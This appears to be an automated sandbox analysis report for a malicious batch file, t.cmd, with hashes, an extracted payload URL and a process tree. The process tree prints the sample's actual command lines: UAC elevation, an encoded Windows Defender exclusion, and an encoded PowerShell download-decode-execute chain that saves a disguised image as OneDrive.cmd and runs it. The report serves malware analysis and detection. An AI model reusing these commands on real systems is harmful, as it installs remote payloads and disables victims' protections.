Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
02-01-2025 09:15
Static task
static1
Behavioral task
behavioral1
Sample
t.cmd
Resource
win7-20240903-en
General
-
Target
t.cmd
-
Size
1KB
-
MD5
c3a80dbc5b98aac01cc124b59ec52d7e
-
SHA1
eae4d2a89be841042839e8bfeca7480a2ba327e4
-
SHA256
4d5a2a643cdab50f0105e110a8187cd812a7ebbc7d903b8a8029cd3508094f32
-
SHA512
addf559ed04d9cbaccdc25d87940c0c0af41e183087c9c956bab438b7cf755a7481aa88d534792c265ace9491302ae81343de77d4c93101a232d44d47500d5a9
Malware Config
Extracted
https://i.imghippo.com/files/Zf9637kKg.jpg
Signatures
-
pid Process 2768 powershell.exe 2388 powershell.exe 2368 powershell.exe 2652 powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2388 powershell.exe 2368 powershell.exe 2368 powershell.exe 2368 powershell.exe 2768 powershell.exe 2740 powershell.exe 2652 powershell.exe 2616 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 2388 powershell.exe Token: SeDebugPrivilege 2368 powershell.exe Token: SeDebugPrivilege 2768 powershell.exe Token: SeDebugPrivilege 2740 powershell.exe Token: SeDebugPrivilege 2652 powershell.exe Token: SeDebugPrivilege 2616 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 2128 wrote to memory of 2388 2128 cmd.exe 31 PID 2128 wrote to memory of 2388 2128 cmd.exe 31 PID 2128 wrote to memory of 2388 2128 cmd.exe 31 PID 2128 wrote to memory of 2368 2128 cmd.exe 32 PID 2128 wrote to memory of 2368 2128 cmd.exe 32 PID 2128 wrote to memory of 2368 2128 cmd.exe 32 PID 2368 wrote to memory of 2340 2368 powershell.exe 33 PID 2368 wrote to memory of 2340 2368 powershell.exe 33 PID 2368 wrote to memory of 2340 2368 powershell.exe 33 PID 2340 wrote to memory of 2768 2340 cmd.exe 35 PID 2340 wrote to memory of 2768 2340 cmd.exe 35 PID 2340 wrote to memory of 2768 2340 cmd.exe 35 PID 2340 wrote to memory of 2740 2340 cmd.exe 36 PID 2340 wrote to memory of 2740 2340 cmd.exe 36 PID 2340 wrote to memory of 2740 2340 cmd.exe 36 PID 2740 wrote to memory of 2652 2740 powershell.exe 37 PID 2740 wrote to memory of 2652 2740 powershell.exe 37 PID 2740 wrote to memory of 2652 2740 powershell.exe 37 PID 2340 wrote to memory of 2616 2340 cmd.exe 38 PID 2340 wrote to memory of 2616 2340 cmd.exe 38 PID 2340 wrote to memory of 2616 2340 cmd.exe 38
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\t.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w h -command ""2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2388
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\t.cmd' -ArgumentList 'am_admin'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\t.cmd" am_admin3⤵
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w h -command ""4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2652
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enc JAB1AHIAbAA9ACIAaAB0AHQAcABzADoALwAvAGkALgBpAG0AZwBoAGkAcABwAG8ALgBjAG8AbQAvAGYAaQBsAGUAcwAvAFoAZgA5ADYAMwA3AGsASwBnAC4AagBwAGcAIgA7ACQAcABhAHQAaAA9ACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABPAG4AZQBEAHIAaQB2AGUAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAAgAC0ARgBvAHIAYwBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AGkAdwByACAAJAB1AHIAbAAgAC0ATwB1AHQARgBpAGwAZQAgACIAJABwAGEAdABoAFwAYgB1AGQAZAB5AC4AagBwAGcAIgA7AFsASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAVABlAHgAdAAoACIAJABwAGEAdABoAFwATwBuAGUARAByAGkAdgBlAC4AYwBtAGQAIgAsAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAZwBjACAAIgAkAHAAYQB0AGgAXABiAHUAZABkAHkALgBqAHAAZwAiACAALQBSAGEAdwApACkAKQApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAJABwAGEAdABoAFwATwBuAGUARAByAGkAdgBlAC4AYwBtAGQAIgA=4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2616
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD563e0b08036c255260fd0d81d8d89748a
SHA1e6b8dd7b7c50a1d5d5334cfa305f96dc2a65842c
SHA256e64bcc70217457cfe419f23824a41961a60a2ad01227d73932a87d9e9cc20d72
SHA512b28317da008026e8348ae9b34563217d99dbd19236fedcb029581e3329e374890dabd037ded3e5b4462136ce421718796b03a0bd1efeccc9a1ac20460a2ca235